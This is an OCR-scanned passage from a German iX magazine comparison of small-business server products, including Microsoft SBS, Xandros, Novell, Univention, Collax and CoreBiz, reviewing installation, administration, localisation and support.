mäß der im Server eingestellten Vorga- 
ben. Das Basis-Windows muss auf dem 
Client aber schon vorhanden sein - ei- 
ne komplette Installation wie bei Core- 
Biz oder UCS via PXE sieht Microsoft 
nicht vor. Der Server kann angeschlos- 
sene Clients im Betrieb automatisch 
mit Windows-Updates versorgen. Die 
Updates kann ein Client direkt aus dem 
Internet beziehen; bei größeren Umge- 
bungen kann das der Server überneh- 
men und sie lokal vorhalten. 

Natürlich enthält der SBS einen Fax- 
dienst, stellt Drucker bereit und ermög- 
licht die Zusammenarbeit. Für Letzte- 
res gibt es nicht nur die Öffentlichen 
Ordner im Exchange-Server, sondern 
auch die Webdienste des eingebauten 
Sharepoint-Servers. Mit dem ISA-Ser- 
ver liefert der SBS eine Firewall und ei- 
ne VPN-Verwaltung mit — vom Stand- 
punkt der IT-Sicherheit empfiehlt es 
sich aber nicht, — unabhängig vom Be- 
triebssystem — den internen Firmenser- 
ver gleichzeitig als Internet-Gateway 
und Firewall einzusetzen. 


Management Console : zanserver.wombat.han.de 
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Microsofts SBS lässt sich recht mit- 
teilsam einstellen: Auf Wunsch schickt 
er dem Administrator per E-Mail Status- 
meldungen der einzelnen Dienste. Auch 
erzwingt er bei jedem Herunterfahren 
die Eingabe eines Grundes (bei einem 
Absturz erfolgt die Abfrage beim nächs- 
ten Neustart) — für die Qualitätssiche- 
rung des Betriebs eine gute Idee. 

Wie zu erwarten hinterlässt der SBS 
insgesamt einen sehr runden Eindruck. 
Alles ist so, wie man es von Windows 
erwartet: miteinander integriert, auto- 
matisch, nicht immer durchschaubar 
und mit dem Microsoft-typischen 
Look & Feel. Ob man das mag oder 
nicht, muss jeder selbst entscheiden. 


Bi Xandros Server 


Xandros bewirbt seinen Server als Li- 
nux-Lösung für Windows-Umgebun- 
gen. Die Zielgruppe sind ganz klar 
Unternehmen, die zwar die Lizenzkos- 
ten für einen Windows-Server sparen, 
auf den Arbeitsplätzen jedoch weiter- 
hin Windows einsetzen wollen. 

Zum Test diente der per Download 
bezogene Xandros Server in der Ver- 
sion 2. Ihn gibt es als 32- und 64-Bit- 
Version. Da es allerdings die Groupware 
Scalix nur in der 32-Bit-Version gibt, ist 
die 64-Bit-Version des Grundsystems 
nur sinnvoll, wenn man keine Maillö- 
sung braucht. Die Basis ist ein Debian 
GNU/Linux mit Kernel 2.6.18. Für den 
deutschen Markt gibt es einen gravieren- 
den Nachteil: Weder der Xandros Ser- 
ver noch Scalix sind durchgehend auf 
deutsch lokalisiert. Xandros’ Eigenent- 
wicklungen etwa liegen nur auf Eng- 
lisch vor. Stellt man den Server auf 
Deutsch ein, erhält man einen schwer 
verdaulichen Sprachenmix serviert. 


Xandros lehnt 

sich mit seinem 
Verwaltungs-Tool 
nicht nur optisch an 
die Redmonder 
Vorlage an (Abb. 2). 


Xandros sieht den Server als Alter- 
native zum Windows Server 2003. Die 
Administration erfolgt über die GUI- 
Anwendung namens xMC (Xandros 
Management Console), über die sich 
mehrere Rechner in einer „Managed 
Community“ verwalten lassen. xMC gibt 
es für Linux und Windows. Sofern man 
den Server ohne X11 installiert, muss 
man die xMC auf einem anderen Rech- 
ner einspielen. Die Installationsroutine 
fragt die nötigen Parameter ab, auch eine 
Integration mit vorhandenen DHCP- und 
DNS-Servern klappte problemlos. 

Dass Xandros eine Dual-Boot-In- 
stallation mit einem vorhandenen Be- 
triebssystem unterstützt, ist löblich — 
bei einem Server allerdings überflüssig. 
Vermutlich handelt es sich um ein 
Überbleibsel des hauseigenen Linux- 
Desktops. Die Unterstützung für eine 
Xen-basierte Installation dagegen kann 
sich als sehr nützlich erweisen. Nach 
dem ersten Reboot startet ein „First 
Start Wizard“, der alle noch nötigen 
Einstellungen erfragt. Der Server inte- 
griert sich gut in ein vorhandenes Netz, 
beachtet sowohl DHCP als auch DNS, 
erkennt alle CUPS-Server sowie deren 
Drucker und bindet sie ein. Insgesamt 
hat sich Xandros große Mühe gegeben, 
die Installation so zu gestalten, dass ein 
Linux-unerfahrener Windows-Admin 
sie problemlos durchführen kann. 

Der Installationsumfang besteht aus 
einer DVD, die Premium Edition be- 
steht aus zwei zusätzlichen CDs mit 
weiterer Software: MySQL Communi- 
ty Server, Oracle 10h Express Edition, 
Acrobat Reader, IBM Websphere Com- 
munity Edition, JBoss, NoMachine Ser- 
ver, Scalix Server und Clients sowie 
SugarCRM. Somit ist für so ziemlich je- 
den Zweck eine Anwendung vorhanden. 
Grundsätzlich ist die Administration der 
Zusatzsoftware in die xMC beziehungs- 
weise den „Network Manager“ (Instal- 
lation und Updates) integriert, für eini- 
ge Details muss man aber doch die von 
der jeweiligen Software mitgelieferten 
Tools bemühen. 

Nicht ganz gelungen ist die Inte- 
gration der Oracle Installation. Be- 
nutzt man die Minimalforderungen des 
Xandros-Servers (40 GByte HD und 
512 MByte RAM), dann richtet der 
Xandros-Installer 775 MByte Swap ein 
— zu wenig für Oracle, man muss dem 
System manuell mit mkswap, swapon 
& Co. zu Leibe rücken. Zum Abschluss 
muss der Administrator noch ein Ora- 
cle-spezifisches Installationsskript auf- 
rufen — diese Tatsache bekommt er 
immerhin mitgeteilt. 
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Leider reagiert der Xandros Server 
recht sensibel auf abrupte Unterbre- 
chungen. Nach einem Absturz während 
der Installation musste der Tester ma- 
nuell per dpkg --configure -a aufräu- 
men; immerhin erschien eine entspre- 
chende Meldung. Nach einem weiteren 
Absturz im Testbetrieb versagte die 
xMC komplett den Dienst. Das System 
war so durcheinandergeraten, dass nur 
noch ein Remote Login durch den Xan- 
dros Support weiterhalf. Erst nach 
mehreren Tagen lief das System wie- 
der. Für den iX-Test erfolgte der Sup- 
port direkt vom Hersteller aus Ottawa 
auf Englisch - für zahlende deutsche 
Kunden steht jedoch auch ein deutsch- 
sprachiger Support zur Verfügung. 

Xandros zeigt mit seinem Server ei- 
nige sehr gute Ansätze. Insbesondere 
beweisen die Kanadier, dass man auch 
unter Linux eine Verwaltungsoberfläche 
schaffen kann, die sich im Handling 
selbst eingefleischten Windows-Admi- 
nistratoren erschließt. Leider lassen 
die Durchführung im Detail und die 
Stabilität derzeit noch zu wünschen 
übrig. Das größte Hindernis ist jedoch, 
dass der Systemverwalter mangels 
deutscher Lokalisierung der Kernele- 
mente derzeit ohne (IT-)Englisch- 
kenntnisse nicht weiterkommt. 


Novell liefert mit dem Open Workgroup 
Server (NOWS) in der Small Business 
Edition eine auf dem SLES 9 (Suse Li- 
nux Enterprise Server) beruhende Soft- 
ware-Zusammenstellung, deren Verwal- 
tung einheitlich über das webbasierte 
iManager-Tool erfolgt. Passend zum 
Server bietet der Hersteller mit dem 
Suse Linux Enterprise Desktop (SLED) 
einen Linux-Client an. 

Die schon etwas angegraute SLES-9 
Basis benutzt einen recht alten Kernel 
2.6.5-7.286-default und setzt standard- 
mäßig noch ReiserFS ein — angesichts 
der ungewissen Zukunft dieses Datei- 
systems eine eher unglückliche Wahl. 


Novell Open 
Workgroup Server 
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Für die Systemverwaltung setzt Novell ein Web-Frontend ein (Abb. 4). 


Laut Hersteller arbeitet man an einer 
auf SLES-10 basierenden neuen Ver- 
sion. Kurioserweise warnt der Installer 
zwar, man sei gerade dabei, eine 32- 
Bit-Software auf einem 64-Bit-System 
zu installieren — es gibt jedoch gar kei- 
ne 64-Bit-Version des Servers als 
Download (nur von den Clients). Für 
die Installation kommt Yast aus dem 
SLES zum Einsatz. Für Lesefaule kann 
sich dies rächen: Nur im Quickstart 
Guide (PDF) steht, dass man die Soft- 
wareauswahl während der Installation 
keinesfalls verändern darf. Im Installer 
selbst kann man dies jedoch einfach tun 
und es fehlt auch jeglicher Warnhin- 
weis. Am Ende kopiert die Installa- 
tionsroutine ungefragt den Inhalt der 
Installations-DVD auf die Festplatte. 
Das ist sicher hilfreich, wenn man oh- 
ne Einlegen der DVD später Software 
nachinstallieren möchte. Ob dies je- 
doch den Platzverbrauch rechtfertigt 
sei einmal dahingestellt. 

Nach dem ersten Neustart läuft die 
Installation webbasiert weiter. Der mo- 
difizierte KDM-Login des Servers weist 
auf die URL der Admin-Oberfläche — 
allerdings in teilweise recht krausem 
Deutsch (siehe Abb. 3). Auch bei gro- 
ßen Firmen ist Lokalisierung ab und 
an Glücksache. Vor der Installation 


Um NOWS SBE aufzustellen, ein web browser zu 
https://192.168.80.238:8181 bitte öffnen 


Benutzername: [ 
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Novell überrascht 
gelegentlich mit 
zumindest interpreta- 
tionsfähigen Über- 
setzungen (Abb. 3). 


der weiteren Softwarepakete erfolgt 
erst einmal ein Online-Update (auf 
Wunsch), das im Test 26 Pakete umfas- 
ste. Danach stehen die zu installieren- 
den Module zur Wahl: Das Spektrum 
reicht dabei von Dynamic Local User 
(legt auf angeschlossenen Windows- 
Clients automatisch den Nutzer an, so- 
bald man ihn im eDirectory einträgt) 
über Directory Services (eDirectory) 
und Management Tools (iManager), bis 
hin zu VPN Server (OpenVPN) oder 
Firewall (IPTables). Die Auswahl ist 
umfassend, jedoch sind auch hier die 
Komponenten nicht unbedingt die neu- 
esten. Zusätzlich zu einem TightVNC 
würde man sich ein (Free-)NX wün- 
schen. Auch ClamAV ist sicher nicht 
der optimale Virenscanner — wenn auch 
der einzige kostenfreie. 

Die Installationsprozedur hat durch- 
aus noch ein paar Haken und Ösen: Zu- 
nächst startet sie wieder auf Englisch, 
selbst wenn man bei der Grundinstal- 
lation schon auf Deutsch umgestellt 
hatte. Außerdem muss man bei jedem 
Modul einzeln auswählen, ob man „ba- 
sic“ oder „advanced“ wünscht — ohne 
weitere Erläuterung. Der Tester tappte 
auch prompt in eine Falle: Die Aus- 
wahl von „basic“ bei HylaFax führt zu 
einer Einrichtung des Faxservers für 
eine US-amerikanische Umgebung. 
Ebenfalls sollte man nicht versuchen, 
einen Faxserver auf einem Rechner 
ohne geeignete Schnittstelle einzurich- 
ten: die Installation hängte sich im Test 
einfach auf und präsentierte eine weiße 
Seite im Browser. Auch ein „zurück“ 
half nicht mehr; der Tester musste die 
gesamte Installation wiederholen. Auch 
am Samba-Paket verschluckte sich die 
Installation (eventuell als Folgefehler 
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der Fax-Panne) derart, dass das Ein- 
spielen (die Pakete liegen in /opt/me- 
dia/nows/) schließlich manuell mit rpm 
-Uhv ... erfolgen musste . 

Für die Administration bietet der 
NOWS eine komplett deutsch lokalisier- 
te Weboberfläche. Sie ist recht komplex, 
aber auch vollständig. Leider ruft sie für 
fast alle Teilaufgaben in separaten Fens- 
tern die Tools iManager oder iPrint auf 
— diese sind nur dann auf Deutsch, wenn 
der aufrufende Browser Deutsch als be- 
vorzugte Sprache eingestellt hat, unab- 
hängig von der Sprachwahl des Servers. 
Dem iManager merkt man die Herkunft 
aus der Welt der großen Rechenzentren 
an: Er kann alles und lehnt sich stark an 
die darunterliegenden eDirorectory/ 
LDAP-Attribute an. Gut für den tech- 
nisch versierten Administrator, aber 
schlecht für den aus der Windows-Welt 
kommenden EDV-Beauftragten einer 
kleinen Firma. Ohne technisches Wissen 
ist hier viel Handbuchlektüre nötig — die 
Oberfläche ist nicht intuitiv und besticht 
durch viele Abhängigkeiten: Einen 
Nutzer mit Homeverzeichnis kann der 
Administrator (logisch korrekt) erst 
anlegen, wenn er vorher die im Netz 
verteilbaren Speicherorte („Volumes‘“) 
eingerichtet hat. Einen Hinweis darauf 
oder auch nur einen Direktlink gibt es 
jedoch nicht. Wizards oder Assistenten, 
die den Administrator in der richtigen 
Reihenfolge durch den Dschungel füh- 
ren, fehlen ebenfalls. Ob eine Admi- 
nistration auch über die Remote-Ad- 
min-Software ConsoleOne erfolgen 
kann, war nicht Gegenstand des Tests. 

Novells Server für KMU stellt alle 
benötigten Dienste bereit. Man merkt 
ihm jedoch deutlich an, dass der Herstel- 
ler ihn aus großen Rechenzentrumsum- 
gebungen abgeleitet hat. Die Bezeich- 


nung „Small Business Edition“ bezieht 
sich augenscheinlich eher auf das Preis- 
modell als auf die technische Konzep- 
tion — wofür auch die maximal zulässige 
Zahl von immerhin 200 Clients spricht. 
Für den Einsatz in kleinen Unternehmen 
eignet er sich nur, wenn ein technisch 
sehr versierter Mitarbeiter oder Dienst- 
leister zur Verfügung steht. Novell teil- 
te kurz vor Redaktionsschluss mit, dass 
die Veröffentlichung des auf SLES1O0 
SPI1 basierenden Nachfolgers kurz be- 
vorsteht. Sobald er verfügbar ist, wird 
sich iX das Update noch einmal genau- 
er ansehen. 


w Univention Corporate 
Server 


Eher am oberen Rand der Zielgruppe 
tummelt sich Univentions Corporate 
Server (UCS): Er lässt sich natürlich 
als alleinstehendes System einsetzen, 
aber seine besonderen Qualitäten spielt 
er in verteilten Umgebungen aus. Dort 
kann er dazu dienen, viele Server und 
Desktops zentral zu administrieren. 
Passend zum Server liefern die Bremer 
auch einen darauf abgestimmten Desk- 
top. Wer zusätzlich zur normalen Ser- 
verfunktionalität auch eine Groupware 
wünscht, kann entweder den Univen- 
tion Groupware Server (UGS) mit Ko- 
lab als Basis einsetzen oder den „nor- 
malen“ UCS mit zertifizierten Paketen 
wahlweise mit Kolab, Scalix oder Za- 
rafa aufrüsten. Als Standarddatenbank 
ist PostgreSQL an Bord, allerdings 
nicht in die Administration eingebun- 
den. „Spielereien“ sucht man verge- 
bens, dafür ist — der Herkunft aus ver- 
teilten Umgebungen geschuldet - ein 
Nagios-Server mit an Bord. 


Eriwtiete Ft ‚chrerik h atran if 


Univentions Server basieren auf De- 
bian (Kernel Version 2.6.18-ucs57, 
wahlweise auch 2.6.24). Nach dem üb- 
lichen Start eines englischen Grub 
schaltet die Installation auf Wunsch 
schnell komplett auf Deutsch um. Po- 
sitiv ist, dass das System DNS- und 
LDAP-Domain-Angaben auf formale 
Konsistenz prüft — nicht jeder Vertip- 
per führt so später zu schwer erkennba- 
ren Fehlern. Außerdem akzeptiert UCS 
nur verhältnismäßig sichere Passwör- 
ter mit mindestens acht Zeichen. Als 
einziges Produkt im Test fordert der 
UCS die manuelle Eingabe aller De- 
tails (beispielsweise Länderkennung) 
für das generierte SSL-Zertifikat. An- 
dere Produkte leiten diese Angaben 
aus anderen Eingaben ab oder verwen- 
den Standardwerte. 

Eine Virtualisierung mit Xen ist vor- 
gesehen (nur mit dem 2.6.18er Kernel), 
der entsprechende Kernel wird mitin- 
stalliert. Eine Einbindung in eine vor- 
handene DHCP-Struktur scheitert aller- 
dings zunächst am nicht aktivierten 
DHCP-Client — eine manuell eingegebe- 
ne statische IP ist Pflicht. Nach dem ers- 
ten Neustart präsentiert sich ein GDM 
X11 Loginscreen — den root allerdings 
nicht nutzen darf; der Superuser darf 
sich nur auf der Textkonsole einloggen. 
Der separat angelegte Nutzer „Adminis- 
trator‘‘ (ohne Root-Rechte) darf natür- 
lich unter X11 ins System. Da die Ad- 
ministration jedoch komplett webbasiert 
ist, ist dies faktisch nie nötig - folgerich- 
tig existieren keine über das normale 
Debian hinausgehenden grafischen Ad- 
min-Tools. Es existieren jedoch Konso- 
lenwerkzeuge zur Administration, so- 
dass sich UCS komplett mit Skripten 
steuern lässt und ohne X11 (der Server 
verwendet KDE) auskommen könnte. 
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Univentions webbasierter Directory Manager ist vielseitig 
und vollständig - auch wenn hin und wieder die 
Übersichtlichkeit ein wenig leidet (Abb. 5). 
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Für große Umgebungen sicherlich sinnvoll, im KMU-Sektor 
eher zu viel des Guten: Univentions obligatorische 
Suchmaske (Abb. 6). 
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Ein Hinweis auf die URL der Admin- 
Oberfläche fehlt jedoch auf dem X11- 
Loginscreen. An einer Stelle braucht 
man doch eine Shell: Die Lizenz lässt 
sich nur über ein Kommandozeilen-Tool 
einspielen. Die Weboberfläche ist in der 
verwendeten Standard-UGS-Installation 
nicht nur über HTTPS, sondern auch un- 
verschlüsselt über HTTP zu erreichen — 
unter Sicherheitsgesichtspunkten keine 
sehr glückliche Idee. Über die integrier- 
te Firewall lässt sich dies beheben. Im 
Gegensatz dazu verfällt eine geöffnete 
Admin-Session in der Weboberfläche 
schon nach fünf Minuten Inaktivität. 
Danach ist ein erneutes Einloggen erfor- 
derlich. Diese Einstellung kann man 
zwar ändern, muss dafür jedoch zu- 
nächst länger die Handbücher studieren. 
Da man nach einem neuen Login nicht 
wieder da landet, wo man aufgehört hat, 
sondern im Hauptmenü, lohnt sich diese 
Mühe jedoch. 

Beim Test tauchte ein Lokalisie- 
rungsfehler auf der Textkonsole auf: 
Beim Einsatz von latinl-nodeadkeys 
erhält man trotz DE-Lokalisierung ein 
englisches Tastatur-Layout. Wählt man 
latin], klappt alles wie erwartet. Diesen 
Fehler hat der Univention-Support als 
Bugreport aufgenommen, er dürfte in 
einer der nächsten Versionen wieder 
verschwunden sein. Außerdem trat ein 
Absturz der Webadministrations-Ober- 
fläche auf, der wohl auf einem alten 
Debian-Paket beruht, das die LOCALE 
falsch setzt. Auch dies dürfte wohl bald 
beseitigt sein. Beide Anfragen bearbei- 
teten die Bremer sehr schnell. 

Absolut vollständig ist die Webober- 
fläche zur UCS-Administration. Es las- 
sen sich wirklich alle Details der verwal- 
teten Dienste und Rechner einstellen. Da 
die Oberfläche kein Ajax einsetzt, funk- 
tioniert sie in allen Lebenslagen. Aller- 


Bebaten Amiht Chronik (esezechen Extran bike 


dings sieht sie schon etwas altbacken 
aus, vergleicht man sie mit den neueren 
Produkten. Ob man lieber „Web2.0“- 
Feeling oder etwas klassischeres mag, 
ist aber sowieso Geschmackssache. We- 
niger gelungen ist im Vergleich die Be- 
nutzerführung. Zwar existieren einige 
Assistenten für Routineaufgaben, die 
Oberfläche erliegt aber leider des Öfte- 
ren dem „Reiterwahn“ (siehe Abb. 5). 
Oft ist nicht ersichtlich, in welcher Rei- 
henfolge man die Reiter beim Anlegen 
neuer Objekte abarbeitet. Das erfordert 
einige Einarbeitung. 

Die gesamte Systemverwaltung be- 
ruht auf LDAP - der normale Adminis- 
trator merkt davon jedoch nichts. Wer je- 
doch gerne direkt mit LDAP-Attributen 
jongliert, Kann dies tun. Die Adminis- 
tration der Groupware ist bis hin zum 
Verwalten von Abwesenheitsnotizen 
komplett in die Oberfläche integriert — 
separate Tools sind nicht nötig. Der 
Fluch der Vollständigkeit zeigt sich bei- 
spielsweise bei der Samba-Verwaltung: 
Die Software bietet so viele Rechte-Ein- 
stellungen, dass die entsprechende Mas- 
ke überladen wirkt. Dies ist jedoch nicht 
nur bei Univention so, auch die anderen 
Hersteller kämpfen mit diesem Phäno- 
men. An manchen Stellen sind die Feh- 
lermeldungen nicht besonders aussage- 
kräftig: “LDAP Fehler: Object class 
violation“ dürfte dem Admin in einem 
kleinen Betrieb nicht besonders helfen. 
Aber auch dies ist bei anderen Herstel- 
lern nicht besser. Eine Spezialität des 
UCS ist jedoch die unvermeidliche 
Suchmaske (siehe Abb. 6), die immer zu 
durchlaufen ist, bevor UCS irgendeine 
Liste (Nutzer, Drucker, Server, ...) an- 
zeigt. In großen Umgebungen sinnvoll — 
wenn jedoch nur ein einziger Server 
oder wenige Objekte vorhanden sind, 
stört es den Arbeitsfluss doch erheblich. 
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ansprechende 
Oberfläche, die sich 
vor allem für Linux- 
Unerfahrene eignet 
(Abb. 7). 


Auch als Einzelstück macht der in- 
klusive aller Management-Werkzeuge 
unter der GPL lizenzierte UCS eine gute 
Figur — man merkt ihm jedoch an, dass 
er sich eigentlich gern mit mehreren sei- 
nesgleichen umgibt. Die rein webba- 
sierte Administration ist vollständig, 
dadurch jedoch auch oft überladen. Ei- 
ne Grundüberholung der Oberfläche in 
Struktur und Design würde dem Produkt 
sicher gut zu Gesicht stehen und ist laut 
Hersteller für Version 3.0 vorgesehen. 
Der Support des Bremer Herstellers ist 
dagegen gewohnt routiniert und schnell. 


Collax zielt mit seinem Business Ser- 
ver bewusst auf kleinere und mittlere 
Unternehmen. Zur Erhöhung der At- 
traktivität bietet Collax eine ausführli- 
che API an und ermuntert die Herstel- 
ler proprietärer Software, ihre Produkte 
für Collax zu portieren und anzubieten. 
Mit der Gewinnung von Pentaprise und 
Sage zeigt diese Strategie erste Erfol- 
ge. Den Collax Server gibt es als Busi- 
ness Server mit optionaler Groupware 
(Open-Xchange) oder als Collax OX- 
Server. Letzterer ist auf den Ersatz von 
Exchange fokussiert und bietet nicht al- 
le Funktionen des Business Server. Al- 
le Varianten bietet der Hersteller ent- 
weder als Software oder gebündelt mit 
Hardware als fertige Appliance an. 
Installationspakete für den Server 
gibt es frei zum Herunterladen. Von der 
„LiveCD“ lässt sich das System auch 
installieren und betreiben. Für Aktuali- 
sierungen muss man eine bei Collax zu 
beziehende Lizenznummer eingeben. 
Weitere Module wie Virenscanner oder 
der Open-Xchange Server lassen sich 
durch die Eingabe weiterer kosten- 
pflichtiger Lizenz-Codes freischalten. 
Im hier betrachteten Umfeld eher un- 
gewöhnlich ist die gänzlich textbasierte 
Installation. Dies ist grundsätzlich keine 
schlechte Idee, leider fehlt die Option, 
im Fehler- oder Vertipperfall zum vor- 
herigen Punkt zurückzukehren. Man 
sollte also nicht vorschnell next anwäh- 
len. Die Installationsroutine erfragt 
zwar die Zeitzone, nicht jedoch Spra- 
che oder Tastaturbelegung. Das eigent- 
liche Einspielen läuft auf zry/, auf tty3 
kann man den Fortschritt verfolgen. 
Interessanterweise befindet sich auf 11y4 
eine offene Root-Konsole - dies ist bei 
keinem anderen System im Test so. Das 
auf der hauseigenen Linux-Distribution 
Pynix basierende System arbeitet mit 


Collax 
Business Server 
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Bei der CoreBiz Management Console schimmert das darunter werkelnde LDAP- 


Verzeichnis immer durch (Abb. 8). 


Kernelversion 2.6.16.57 und verwendet 
eine proprietäre Oberfläche. Für den 
deutschen Markt fragwürdig ist, dass die 
angezeigte und zu bestätigende GPL 
(für die freien Teile) nur auf Englisch 
verfügbar ist. Nach dem ersten Neustart 
geht es nur per Browser (Port 8001) 
weiter: Collax installiert als einziges 
Produkt im Test kein GUI und hält den 
Plattenbedarf entsprechend klein. 
Allerdings weist der Installationspro- 
zess noch einige Merkwürdigkeiten auf. 
So legt er beispielsweise den root-Ac- 
count an, das Passwort legt jedoch erst 
(als erster Schritt) nach dem Neustart die 
browserbasierte weitere Konfiguration 
fest. Letztere empfiehlt, dass root-Pass- 
wort „an einem sicheren Ort, zum Bei- 
spiel in einem Tresor“ (was gut ist) oder 
„besser in Ihrem Kopf“ aufzubewahren 
(was keine gute Idee ist, denn was pas- 
siert, wenn der Admin einmal krank 
wird oder kündigt?). Wenn man sich 
während der Basisinstallation vertippt, 
beispielsweise bei der Netzkonfigura- 
tion, und deshalb das System per Brow- 
ser nicht erreichen kann, muss man 
zwangsweise ganz von vorne anfangen. 
Ein Beziehen der eigenen IP-Adresse 
per DHCP sieht Collax nicht vor, man 
muss für ethO eine feste IP einstellen. 
Das integrierte Open-Xchange geht an- 
scheinend davon aus, in eine neue Um- 
gebung zu kommen: Für die Groupware 
stehen keine Migrations-Tools zum Er- 
setzen eines Exchange-Servers bereit. 
Da die Basisinstallation keinerlei 
Fragen zum Netz (außer Rechnerna- 
men und Domainname) stellt, lässt sich 
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die Installation entsprechend einfach 
bewerkstelligen. Die restlichen nötigen 
Parameter wie DNS-Server oder De- 
fault-Route trägt der Administrator spä- 
ter in der Weboberfläche ein; hier ist 
eine besser Benutzerführung möglich. 
Für die Grundkonfiguration durchläuft 
der Systemverwalter mehrere Assisten- 
ten, vorher ist der Server nicht wirklich 
betriebsbereit. Etwas Detailpflege an 
den Vorgaben würde dem Produkt 
guttun. Beispielsweise macht Collax 
bei der Einstellung eines externen 
NTP-Servers keinen Vorschlag, üblich 
sind bei anderen Produkten Vorschläge 
wie pool.ntp.org oder ntp].ptb.de. 

Im Test ließ sich zunächst nach der 
Installation keine Default-Route einstel- 
len. Es gab zwar keine Fehlermeldung, 
aber auch keine Route. Der angefragte 
Support reagierte sehr schnell und stell- 
te per Remote Login eine korrupte 
LDAP-Datenbank fest. Ein Recovery 
behob das Problem. Ungeklärt blieb je- 
doch die Ursache der Inkonsistenz. 

Optisch präsentiert sich Collax mit 
moderner Ajax-Technik und lässt sich 
flüssig bedienen. An die Struktur muss 
man sich allerdings erst gewöhnen. 
Collax’ Besonderheit: Es führt Konfi- 
gurationsänderungen nicht sofort aus, 
sondern stellt sie zunächst in eine War- 
teschlange. Erst durch Anklicken eines 
„jetzt ausführen“-Knopfes landen die 
Änderungen tatsächlich im System. Hat 
sich viel angesammelt, kann das einige 
Zeit dauern. Im Prinzip ist dies eine gu- 
te Vorsorge gegen Vertipper, da man 
die Warteschlange bearbeiten kann. Da 


sich die komplette Konfiguration in ei- 
ner Datei befindet, lassen sich im Sup- 
port-Fall remote Konfigurationen er- 
stellen und „am Stück“ einspielen. 
Ebenfalls lässt sich die Downtime eines 
Dienstes durch Zusammenfassen mini- 
mieren. Der Nachteil ist jedoch, dass 
der Administrator es leicht mal vergisst 
und die Änderungen eben nicht 
„scharf“ schaltet. 

Alle nötigen Parameter lassen sich 
einstellen, bis hin zu Details des Mail- 
oder des mitgelieferten Jabber-Servers. 
Auch Auswertungen über den System- 
zustand sind vorhanden, beispielsweise 
eine Grafik für den Plattenbelegungs- 
zustand. Aber auch hier treten gele- 
gentlich noch kryptische Meldungen 
wie “Error: code:500 origin:3“ auf. 

Für die Ansprüche eines kleineren 
oder mittelgroßen Betriebs ist der 
Funktionsumfang völlig ausreichend, 
zumal mit Open-Xchange eine Group- 
ware mit vielen Zusatzfunktionen wie 
Foren an Bord ist. Im Detail bemüht 
sich Collax um Vielseitigkeit: So las- 
sen sich Dateibereiche (Shares) nicht 
nur über Samba (SMB/CIFS) und NFS 
zur Verfügung stellen, sondern auch via 
Apple-Filesharing, FTP und WebDAV. 
Der Mailserver lässt sich einfach, aber 
vollständig administrieren, bis hin zum 
Spamschutz, bei dem sich beispielsweise 
problemlos die bekannten Blacklists 
an- und abschalten lassen. Als Daten- 
bank liefert Collax PostgreSQL und 
MySQL mit, nur Letzteres lässt sich je- 
doch über die Oberfläche administrieren. 
Die Steuerung einer USV ist genauso 
vorgesehen wie der Aufbau von IPSec- 
Tunneln oder die Netzüberwachung mit 
Nagios. Sogar einige Helferlein wie ping 
lassen sich über die Oberfläche nutzen. 

Insgesamt hinterlässt Collax’ Busi- 
ness Server einen runden Eindruck. In 
die Oberfläche hat der Hersteller viel 
Arbeit und Liebe fürs Detail investiert, 
um sie auch auf Linux-unerfahrene 
Administratoren zu trimmen. Trotzdem 
fehlen keine wichtigen Details. Unge- 
wöhnlich ist allerdings der Zwang, je- 
de Änderung nochmals manuell akti- 
vieren zu müssen. Es ist zu hoffen, dass 
Collax’ Bemühungen, weitere Anbieter 
von Anwendungssystemen für sich zu 
gewinnen, von Erfolg gekrönt werden. 


Ei CoreBiz Server 


CoreBiz — der Linux-Server der Linux 
Information Systems AG (LIS AG) - ist 
in verschiedenen Ausführungen zu ha- 
ben. Auf dem sogenannten Base Server 
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aufbauend gibt es Spezialisierungen für 
Backup, Terminalserver, Cluster, Sto- 
rage, Firewall, EAI, Office, Client, CRM 
und Groupware. Für diesen Test kam die 
Groupware-Variante zum Einsatz, auf 
der ein Kolab werkelt. Die weiteren Mo- 
dule, darunter Backup und die Clusterfä- 
higkeiten, waren nicht Teil dieses Tests. 

Wer ein Produkt out of the Box er- 
wartet, ist bei der LIS AG falsch, sie 
kümmert sich intensiv um ihre Kunden. 
Man kann den CoreBiz Server nicht 
„einfach so“ herunterladen. Jeder Kun- 
de füllt zunächst einen Fragebogen 
zum gewünschten System aus, in dem 
er insbesondere die Netzumgebung 
festlegt. Die LIS AG prüft die vom 
Kunden gewünschte Konfiguration auf 
formale Konsistenz und hält im Zwei- 
fel Rücksprache. Als Ergebnis erhält 
man eine fertig vorkonfigurierte Sys- 
temumgebung auf DVD oder zum 
Download. Auf diese Weise braucht 
man bei der Installation nichts mehr 
einzugeben — man kann es aber auch 
nicht. Sollte doch ein Fehler passiert 
sein oder hat man etwas vergessen (bei- 
spielsweise eine ungewöhnliche oder 
kleinere Bildschirmauflösung als nor- 
mal), muss die LIS AG zunächst ein 
neues Image konfektionieren. 

Für die Installation setzt CoreBiz auf 
FAI (Fully Automatic Installation). 
Klappt alles, ist anschließend ein fer- 
tiges System einsatzbereit. Wenn nicht, 
muss man sich an den Hersteller wen- 
den. Der Tester musste diesen Zyklus 
leider mehrfach durchlaufen: Beim ers- 
ten Versuch war die zugeschickte DVD 
schlicht defekt, beim zweiten Mal gab 
es einen Installationsfehler und erst im 
dritten Anlauf kam ein vollständig lau- 
fendes System am Ende heraus. Der 
Support durch LIS war jedoch immer 
sehr schnell und kompetent. 

Technisch basiert CoreBiz auf Ubun- 
tu 7.04 und nutzt die Kernel-Version 
2.6.23-1. Damit verfügt es über die 
modernste Default-Kernel-Basis im Test. 
Als GUI nutzt es KDE, die Basisverwal- 
tung kann über die normalen nutzer- 
freundlichen Ubuntu-Tools erfolgen. 

Am wohlsten fühlt sich CoreBiz, 
wenn auch die Arbeitsplätze mit dem 
CoreBiz-Client ausgestattet sind. Für 
den Administrator bietet das einen an- 
genehm einfachen Weg, die Arbeits- 
plätze zu installieren und zu adminis- 
trieren. In der Verwaltungskonsole 
kann er die Rechner anlegen und ihre 
Attribute (bis hin zur Bildschirmauflö- 
sung) festlegen. Der in CoreBiz ein- 
gebaute PXE-Server stellt über einen 
TFTP-Server ein passendes Bootimage 


bereit. Hierfür verwendet er erweiterte 
DHCP-Attribute. Praktisch bedeutet 
dies, dass ein zu installierender Rech- 
ner nur noch ein PXE-fähiges Boot- 
ROM/BIOS braucht. Den Rest erledigt 
wiederum FAI. Andererseits bedeutet 
es, dass CoreBiz wegen der eigenen 
DHCP-Attribute zwangsweise einen 
DHCP-Server laufen lassen muss und 
sich nicht in eine bestehende DHCP- 
Struktur einpassen kann. Man muss 
den CoreBiz-Maschinen also mindes- 
tens ein eigenes Netzsegment spendie- 
ren, wenn man aus anderen Gründen 
schon einen DHCP-Server betreibt. 

